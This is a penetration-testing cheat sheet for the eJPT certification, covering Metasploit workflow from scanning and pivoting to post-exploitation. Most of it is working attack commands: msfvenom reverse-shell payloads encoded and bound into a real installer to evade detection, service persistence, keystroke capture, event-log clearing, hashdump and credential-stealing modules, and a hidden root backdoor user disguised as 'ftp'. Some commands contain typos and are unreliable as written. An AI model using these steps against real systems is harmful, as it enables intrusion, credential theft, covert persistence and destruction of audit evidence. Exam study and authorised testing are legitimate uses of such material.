eJPT-CheatSheets
Bartosz Pokrywka
Usefull info and commands for eJPT cert exam
-
Info gathering & Enumeration -> Aux Module
-
Vuln Scanning -> Aux Module, Nessus
-
Exploitation -> Exploit Modules & Payloads
-
Post Exploitation -> Meterpreter
-
Privilege Excalation -> Post Exploitation Modules, Meterpreter
-
Maintaining Persistent Access -> Post Exploitation Modules
msfconsole starting command:
$ sudo service postgresql start && sudo msfconsole
Create:
> workspace -a [name]
Switch:
> workspace [name]
Delete:
> workspace -d [name]
Rename:
> workspace -r <old> <new>
Use nmap XML output:
- -oX [name]
Import it into msfconsole:
> db_import /directory/where/u/saved/the/scan
Type "services" to find out if it has worked.
Nmap also can be used inside msfconsole:
> db_nmap -Pn -sV -O IP, etc.
The results are automaticaly imported into msfconsole.
-
Create a workspace for port scanning.
-
Use aux module:
> search portscanfor example:
> auxiliary/scanner/portscan/tcp -
Run scan.
-
Exploit target.
Now in the meterpreter session perform port scan on the target (PIVOTING):
-
Open shell session:
> shell -
Enum the interface.
-
Add the route in meterpreter:
> run autoroute -s [host] -
Background the session:
> background -
Go again into portscan, and set the rhosts to the next target IP.
-
Scan the second target.
List of available payloads:
> msfvenom --list payloads
Example of creating the payload for 63bit Windows system:
> msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=IPADDRESS LPORT=PORT -f exe > destinationofpayload
- -a (architecture of the target system)
- -p (specify the payload)
- -f (output file)
List of formats:
> msfvenom --list formats
List encoders:
> msfvenom --list encoders
Example of creating encoded payload:
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=IPADDRESS LPORT=PORT -e x86/shikata_ga_nai -f exe > destinationofencodedpayload
You can increase the iteration of encodings by adding:
- -i 10
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=IPADDRESS LPORT=PORT -e x86/shikata_ge_nai -i 10 -f exe -x /Downloads/wrar602.exe > pathtosavethepayload
If you want to maintain the fucntionality of the spoofed exec, use this flag (may not work):
- -k
Prepackaged scripts:
> ls -al /usr/share/metasploit-framework/scripts/resource/
Example of creating a script for automating multi/handler session:
> use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ipaddress
set LPORT port
run
Then save the file as handler.rc
How to use it:
> msfconsole -r handler.rc
Or directly from msfconsole:
msf6 > resource ~/PATH/TO/RESOURCE/FILE.rc
To export commands from previous actions:
msf6 > makerc ~/PATH/TO/SAVE/THE/RESOURCE/FILE.rc
TIP:
When using payloads, you can set LHOST IP address by typing your interface name, such as "eth0, eth1, etc. Much time saved...
It's possible to run commands by not interacting with meterpreter directly. You have to have session in a background, and then:
> sessions -C <commandhere> -i <sessionID>
To upgrade a shell to a meterpreter session without going through few extra steps, use:
> sessions -u <sessionID>
> use exploit/windows/local/persistence_service
> set session <ID>
> set lport <port>
> exploit
Then you can use multi/handler:
> use exploit/multi/handler
> set LHOST <yourIP>
> set LPORT <port>
> exploit
Then reboot target machine to check if it works.
Reminder: RDP default TCP port is 3389.
After gaining access to the target machine use this:
> use post/windows/manage/enable_rdp
> set SESSION <ID>
> run
In meterpreter session:
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
Event logs can be accessed via the Event Viewer
To clear event logs use meterpreter command:
> clearev
Use meterpreter command:
> run autoroute -s IP/SubnetRange
Then use this module to scan ports:
> use auxiliary/scanner/portscan/tcp(or syn, etc)
Then go back to the previous session and forward port:
> portfwd add -l 1234 -p 80 -r <internalNetworkVictimIP>
Then scan this port with nmap:
> db_nmap -sS -sV -p 1234 localhost
Remember to change payload to "bind" type:
> set payload windows/meterpreter/bind_tcp
To upgrade a shell session to meterpreter session:
> sessions -u <ID>
> sysinfo
> getuid
> /bin/bash -i
> cat /etc/passwd
> groups root
> cat /etc/*issue
> uname -r
> uname -a
> ip a s
> netstat -antp
> ps aux
> env
> use post/linux/gather/enum_configs
> set SESSION <ID>
> use post/linux/gather/enum_networks
> set SESSION <ID>
> use post/linux/gather/enum_protections
> set SESSION <ID>
> use post/linux/gather/enum_system
> set SESSION <ID>
> use post/linux/gather/checkcontainer
> set SESSION <ID>
> use post/linux/gather/checkvm
> set SESSION <ID>
> use post/linux/gather/enum_users_history
> set SESSION <ID>
> use post/linux/gather/hashdump
> set SESSION <ID>
post/multi/gather/ssh_creds
post/multi/gather/docker_creds
post/linux/gather/hashdump
post/linux/gather/ecryptfs_creds
post/linux/gather/enum_psk
post/linux/gather/enum_xchat
post/linux/gather/phpmyadmin_credsteal
post/linux/gather/pptpd_chap_secrets
post/linux/manage/sshkey_persistence
After gaining basic foothold of the root account, create new user (obfuscated one, like "ftp", or "sysadmin" if it doesn't exist):
> useradd -m ftp -s /bin/bash
> passwd ftp
Add root access:
> usermod -aG root ftp
Obfuscate more:
> usermod -u 15 ftp
There's also a complete solution packed into metasploit framework:
> search platform:linux persistence
SSH Key:
> chmod 0400 ssh_key
> ssh -i ssh_key root@<targetIP>